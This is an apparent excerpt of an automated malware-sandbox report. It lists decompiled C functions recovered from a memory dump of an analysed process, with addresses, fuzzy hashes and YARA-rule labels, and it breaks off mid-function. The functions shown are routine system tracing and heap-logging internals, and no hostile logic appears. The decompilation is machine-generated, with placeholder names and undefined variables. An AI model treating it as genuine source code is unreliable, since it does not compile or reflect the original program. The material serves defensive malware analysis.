                    			E01731074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0173165E(__ebx, 0x1758ae4, (__edx -  *0x1758b04 >> 0x14) + (__edx -  *0x1758b04 >> 0x14), __edi, __ecx, (__edx -  *0x1758b04 >> 0x14) + (__edx -  *0x1758b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0172AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E01687D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0171FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                    0x01731074
                    0x01731080
                    0x01731082
                    0x0173108a
                    0x0173108f
                    0x01731093
                    0x017310ab
                    0x017310ab
                    0x017310c3
                    0x017310cf
                    0x017310e1
                    0x017310d1
                    0x017310da
                    0x017310da
                    0x017310e9
                    0x017310f5
                    0x017310f5
                    0x017310fe

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b70be61707b81cec197874ce7d078ae2f64f235b66109ed907d70a0cf127a882
                    • Instruction ID: c2b11d29febdf03ac4da59ae9c14fff6fa6b9edf94942fce5bd085d68e8bd362
                    • Opcode Fuzzy Hash: b70be61707b81cec197874ce7d078ae2f64f235b66109ed907d70a0cf127a882
                    • Instruction Fuzzy Hash: F2014772604746DFC710EF69C944B1AFBE9ABC4310F04C629F98583695EE70D945CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0167B02A Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0167B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E01687D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E016E7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                    0x0167b037
                    0x0167b039
                    0x0167b03b
                    0x0167b040
                    0x016ca60e
                    0x00000000
                    0x00000000
                    0x016ca61d
                    0x0167b04b
                    0x0167b04e
                    0x016ca627
                    0x016ca634
                    0x00000000
                    0x00000000
                    0x016ca641
                    0x016ca653
                    0x016ca643
                    0x016ca64c
                    0x016ca64c
                    0x016ca65b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016ca66c
                    0x0167b057
                    0x0167b057
                    0x0167b057
                    0x0167b046
                    0x0167b046
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                    • Instruction ID: a10056e343324e1289da033afcdc94a5736136057cc37bcf33c9b9044c03a4ca
                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                    • Instruction Fuzzy Hash: 4A017C722019849FE3238B5DCD88F767BD8EF95A50F0900A5FA19CBB52E728DC81C624
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0171FE3F Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E0171FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x175d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E016AFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01687D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                    0x0171fe3f
                    0x0171fe3f
                    0x0171fe4e
                    0x0171fe58
                    0x0171fe5d
                    0x0171fe5f
                    0x0171fe6a
                    0x0171fe72
                    0x0171fe75
                    0x0171fe78
                    0x0171fe83
                    0x0171fe95
                    0x0171fe85
                    0x0171fe8e
                    0x0171fe8e
                    0x0171fea0
                    0x0171fea1
                    0x0171fea3
                    0x0171fea8
                    0x0171febd

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9b40a48a5f12bfc3378af967b9cae58988c96740af0addf88ee3df839fadb186
                    • Instruction ID: 20048c375b5a0f52742f0ea72ff1df93d6f01a6598f0de6fbfe783fb2db362b7
                    • Opcode Fuzzy Hash: 9b40a48a5f12bfc3378af967b9cae58988c96740af0addf88ee3df839fadb186
                    • Instruction Fuzzy Hash: A5018471A00259ABDB14DFA9D855FAEBBB9EF44710F40406AF900AB281DA709905CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0171FEC0 Relevance: .0, Instructions: 46COMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E0171FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x175d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E016AFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01687D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                    0x0171fec0
                    0x0171fec0
                    0x0171fecf
                    0x0171fed9
                    0x0171fede
                    0x0171fee0
                    0x0171feeb
                    0x0171fef3
                    0x0171fef6
                    0x0171fef9
                    0x0171ff04
                    0x0171ff16
                    0x0171ff06
                    0x0171ff0f
                    0x0171ff0f
                    0x0171ff21
                    0x0171ff22
                    0x0171ff24
                    0x0171ff29
                    0x0171ff3e

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a71cd2d0590dc4854f66d23902c97d48d1283a2b4050fd5d0e951c146dd33dd7
                    • Instruction ID: c3c0a5c6b393d8b6ff22c341a3d0b8b7cac586d1885ae7e8ba575b7e7bf0171f
                    • Opcode Fuzzy Hash: a71cd2d0590dc4854f66d23902c97d48d1283a2b4050fd5d0e951c146dd33dd7
                    • Instruction Fuzzy Hash: 74018871A00219ABDB14DFA9D845FAEB7B8EF45710F40406AF9009B280D9709901CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01738A62 Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E01738A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x175d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01687D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E016AB640(E016A9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                    0x01738a62
                    0x01738a71
                    0x01738a79
                    0x01738a82
                    0x01738a85
                    0x01738a89
                    0x01738a8c
                    0x01738a8f
                    0x01738a92
                    0x01738a95
                    0x01738a9f
                    0x01738ab1
                    0x01738aa1
                    0x01738aaa
                    0x01738aaa
                    0x01738abc
                    0x01738abd
                    0x01738abf
                    0x01738ac4
                    0x01738ada

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 93f6d1c36230ddf034c3dc97bf340269f9a3956de9e89b51575aae9b47bc86ba
                    • Instruction ID: a223e54387ccc3eb3b7df9c8f3e239b04bb4abfbfec5cbadc8b10c5148c7f50b
                    • Opcode Fuzzy Hash: 93f6d1c36230ddf034c3dc97bf340269f9a3956de9e89b51575aae9b47bc86ba
                    • Instruction Fuzzy Hash: 91012C71A0021DAFCB00DFA9D9419AEBBB8EF58310F50415AFA05E7341D634AE01CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01738ED6 Relevance: .0, Instructions: 44COMMON
                    Download Yara Rule
                    C-Code - Quality: 54%
                    			E01738ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x175d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01687D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                    0x01738ed6
                    0x01738ee5
                    0x01738eed
                    0x01738ef0
                    0x01738efa
                    0x01738f03
                    0x01738f0c
                    0x01738f15
                    0x01738f24
                    0x01738f27
                    0x01738f31
                    0x01738f43
                    0x01738f33
                    0x01738f3c
                    0x01738f3c
                    0x01738f4e
                    0x01738f4f
                    0x01738f51
                    0x01738f56
                    0x01738f69

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3c0e54a8c36812c976b8ec12e843fdb925b19818138fa9a3771d7717b73b2647
                    • Instruction ID: a8598fca6e78da66cda0c88f44513fbf88d3a411b4a209fedf23161b7f9eb8b5
                    • Opcode Fuzzy Hash: 3c0e54a8c36812c976b8ec12e843fdb925b19818138fa9a3771d7717b73b2647
                    • Instruction Fuzzy Hash: 88111271A0025ADFDB04DFA8D541BADF7F4FF08300F5442AAE518EB342D6349940CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166DB60 Relevance: .0, Instructions: 43COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0166DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0166DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0166E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0166E8B0(__ecx, _t14, 0xfff);
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                    0x0166db64
                    0x0166db66
                    0x0166db6b
                    0x0166dbaa
                    0x0166db71
                    0x0166db76
                    0x0166db7a
                    0x0166dba3
                    0x0166db7c
                    0x0166db87
                    0x0166db8b
                    0x016c4fa1
                    0x016c4fb3
                    0x016c4fb8
                    0x0166db91
                    0x0166db96
                    0x0166db98
                    0x0166db98
                    0x0166db8b
                    0x0166db7a
                    0x0166db9d
                    0x0166dba2

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                    • Instruction ID: 1fd86b6f9a436c9055daeac62d907a081321f541a3f91747c53cd44f845563cf
                    • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                    • Instruction Fuzzy Hash: 00F0FC737015239BD3326AD98C80F27BA9ECFE2A60F1A0039F2459B34CCF608C0286D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0166B1E1 Relevance: .0, Instructions: 42COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0166B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01687D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01687D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E016E7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                    0x0166b1e8
                    0x0166b1ea
                    0x0166b1f3
                    0x016c4a17
                    0x0166b1f9
                    0x0166b1f9
                    0x0166b1f9
                    0x0166b201
                    0x016c4a21
                    0x016c4a2e
                    0x00000000
                    0x00000000
                    0x016c4a3b
                    0x016c4a4d
                    0x016c4a3d
                    0x016c4a46
                    0x016c4a46
                    0x016c4a55
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0166b20a
                    0x0166b20a
                    0x0166b20a
                    0x0166b20a

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                    • Instruction ID: 1466c64ee6d8f355744afe0b18af217e5eca5f6549455ffa0e29540c7b32be13
                    • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                    • Instruction Fuzzy Hash: 74016D32200680EBD322969DCC18B69BBDDEF91B54F0940A5EE14CB7A6DB79C801C259
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016FFE87 Relevance: .0, Instructions: 38COMMON
                    Download Yara Rule
                    C-Code - Quality: 46%
                    			E016FFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x175d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01687D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                    0x016ffe96
                    0x016ffe9e
                    0x016ffea1
                    0x016ffead
                    0x016ffeb3
                    0x016ffeb9
                    0x016ffec3
                    0x016ffed5
                    0x016ffec5
                    0x016ffece
                    0x016ffece
                    0x016ffee0
                    0x016ffee1
                    0x016ffee3
                    0x016ffee8
                    0x016ffefb

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: de2dc8c136b7efa78ecceed0fe5bffc2c91533249751f4079fe5f4b136dc5335
                    • Instruction ID: 98156dffae0005c46519031b1358a8cd979761c2e8030c030ca84630e96864df
                    • Opcode Fuzzy Hash: de2dc8c136b7efa78ecceed0fe5bffc2c91533249751f4079fe5f4b136dc5335
                    • Instruction Fuzzy Hash: 74016271A00209EFCB14DFA8D941A6EB7F5EF04704F50419DA914DB382D635D901CB44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0172131B Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    C-Code - Quality: 48%
                    			E0172131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x175d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01687D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                    0x0172131b
                    0x0172132a
                    0x01721330
                    0x01721336
                    0x0172133e
                    0x01721341
                    0x01721344
                    0x0172134f
                    0x01721361
                    0x01721351
                    0x0172135a
                    0x0172135a
                    0x0172136c
                    0x0172136d
                    0x0172136f
                    0x01721374
                    0x01721387

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 186078ffef71b2f362ef857f7cc5f6848721cb2859d4a082d09f43df683b74f2
                    • Instruction ID: 152912188b8b0672449db9954cf6c52f8e0e39499792e1032710a823b73db83e
                    • Opcode Fuzzy Hash: 186078ffef71b2f362ef857f7cc5f6848721cb2859d4a082d09f43df683b74f2
                    • Instruction Fuzzy Hash: 0B013171A01259AFCB04EFA9D945AAEB7F5FF18700F504059F905EB341E6749A00CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01738F6A Relevance: .0, Instructions: 36COMMON
                    Download Yara Rule
                    C-Code - Quality: 48%
                    			E01738F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x175d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01687D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                    0x01738f6a
                    0x01738f79
                    0x01738f81
                    0x01738f84
                    0x01738f8b
                    0x01738f91
                    0x01738f94
                    0x01738f9e
                    0x01738fb0
                    0x01738fa0
                    0x01738fa9
                    0x01738fa9
                    0x01738fbb
                    0x01738fbc
                    0x01738fbe
                    0x01738fc3
                    0x01738fd6

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6e929668a4d2608cfbc833fdced051dd576ce44dc8b8fb90c7742e383245c7d
                    • Instruction ID: 37ede3cdb9cc4eea685de6422e99033cdb116717c82910c5e62b585c56846921
                    • Opcode Fuzzy Hash: f6e929668a4d2608cfbc833fdced051dd576ce44dc8b8fb90c7742e383245c7d
                    • Instruction Fuzzy Hash: 0C014475A0020DEFDB00EFA8D945AAEB7F5EF58300F504159B905EB381DA74DA00CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01721608 Relevance: .0, Instructions: 34COMMON
                    Download Yara Rule
                    C-Code - Quality: 46%
                    			E01721608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x175d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01687D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E016AB640(E016A9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                    0x01721608
                    0x01721617
                    0x0172161d
                    0x01721625
                    0x01721628
                    0x0172162b
                    0x01721636
                    0x01721648
                    0x01721638
                    0x01721641
                    0x01721641
                    0x01721653
                    0x01721654
                    0x01721656
                    0x0172165b
                    0x0172166e

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0df088ac16afc3c0e3e841d4a6adecbbbfc3086c4859811a3e4e51b0af53980d
                    • Instruction ID: d18f15b19ffe6dd5db9e3d5a50a59c3fad18f70ec9395383908536666cbe109b
                    • Opcode Fuzzy Hash: 0df088ac16afc3c0e3e841d4a6adecbbbfc3086c4859811a3e4e51b0af53980d
                    • Instruction Fuzzy Hash: 85F06271A00258EFDB24EFE8D905A6EB7F4FF14300F4440A9E915EB381EA349900CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168C577 Relevance: .0, Instructions: 33COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0168C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0168C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x16411cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E017388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                    0x0168c577
                    0x0168c57d
                    0x0168c581
                    0x0168c5b5
                    0x0168c5b9
                    0x0168c5ce
                    0x0168c5ce
                    0x0168c5ca
                    0x00000000
                    0x0168c5ca
                    0x0168c5c4
                    0x0168c5c8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0168c5ad
                    0x00000000
                    0x0168c5af

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f4de1b2b23f43fd88b87e42e46efda0806729c65aa8ffcb8c0b30d42a5db26d9
                    • Instruction ID: b7f188150bf6c66bd64792a0d4dd6308cf1cd9a3da146316eb50b552e7dcc424
                    • Opcode Fuzzy Hash: f4de1b2b23f43fd88b87e42e46efda0806729c65aa8ffcb8c0b30d42a5db26d9
                    • Instruction Fuzzy Hash: C5F090B29166909FEF36A71C8804BA27FD49B05670F448666E50587702C7A4D8A0C273
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01722073 Relevance: .0, Instructions: 32COMMON
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E01722073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0171FD22(__ecx);
				_t19 =  *0x175849c - _t3; // 0x6c523392
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1758748; // 0x0
					if(__eflags <= 0) {
						E01721C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
